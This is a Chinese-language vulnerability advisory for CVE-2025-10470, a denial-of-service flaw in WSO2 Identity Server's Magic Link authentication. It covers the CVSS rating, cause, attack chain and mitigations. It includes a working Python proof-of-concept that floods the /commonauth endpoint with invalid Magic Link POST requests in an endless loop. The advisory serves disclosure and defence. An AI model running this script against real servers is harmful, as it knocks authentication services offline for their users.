CVE-2025-10470 WSO2 Magic Link认证DoS漏洞

漏洞信息

漏洞编号

CVE-2025-10470

漏洞类型

拒绝服务

CVSS评分

8.6 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WSO2 Identity Server

漏洞概述

CVE-2025-10470 是 WSO2 Identity Server 中 Magic Link 认证流程发现的一个高危安全漏洞。该漏洞源于系统在接收多个无效认证请求时，缺乏足够的速率限制和资源控制机制。攻击者可利用此缺陷，通过发送大量无效请求导致服务器内存使用量不受控制地增长。这种资源耗尽最终会引发拒绝服务（DoS）条件，造成依赖 Magic Link 认证器的服务不可用，严重影响业务连续性。

技术细节

该漏洞的核心技术原理在于 Magic Link 认证处理逻辑中对异常流量处理的缺失。在正常流程中，系统应验证请求并分配资源处理，但在 CVE-2025-10470 中，当攻击者发送无效的认证请求时，系统未能对请求频率进行有效限制。由于 CVSS 向量显示攻击无需用户交互（UI:N）且无需任何权限（PR:N），攻击者可以通过网络（AV:N）轻易地发起自动化攻击。随着无效请求数量的累积，服务器内存将被迅速占用且未及时释放，导致内存溢出或耗尽。由于范围变更（S:C），这种资源耗尽的影响可能从认证组件扩散到整个应用实例，导致系统完全崩溃。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统正在使用 WSO2 Identity Server，并确认其启用了 Magic Link 认证功能。

STEP 2

武器化

攻击者编写或获取自动化脚本，该脚本能够生成并向 Magic Link 认证端点发送大量的无效认证请求。

STEP 3

交付

攻击者通过网络向目标服务器发起攻击，持续发送高频的无效 POST 请求至认证接口。

STEP 4

利用

目标服务器由于缺乏速率限制，不断处理这些无效请求，导致内存资源被持续占用且无法释放，内存使用率呈线性或指数级增长。

STEP 5

影响

服务器资源耗尽，导致 Magic Link 服务甚至整个 Identity Server 实例停止响应，实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests # Target URL for Magic Link authentication (Example) target_url = "https://target-wso2-server/commonauth" headers = { "User-Agent": "CVE-2025-10470-POC", "Content-Type": "application/x-www-form-urlencoded", "Accept": "application/json" } # Data representing an invalid Magic Link request payload = { "username": "[email protected]", "authenticator": "org.wso2.carbon.identity.application.authenticator.magiclink.MagicLinkAuthenticator", "type": "magiclink" } def attack(): print("[*] Starting DoS attack on Magic Link flow...") try: while True: # Send POST request to trigger memory growth response = requests.post(target_url, data=payload, headers=headers, timeout=5) if response.status_code == 200 or response.status_code == 401: print(f"Request sent, server status: {response.status_code}") except KeyboardInterrupt: print("\n[!] Attack stopped by user.") except Exception as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": attack()

影响范围

WSO2 Identity Server (具体受影响版本请参考官方公告 WSO2-2025-4469)

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用 Magic Link 认证器，改用其他认证方式；同时在反向代理层面配置针对 /commonauth 等关键路径的访问频率控制，以缓解攻击影响。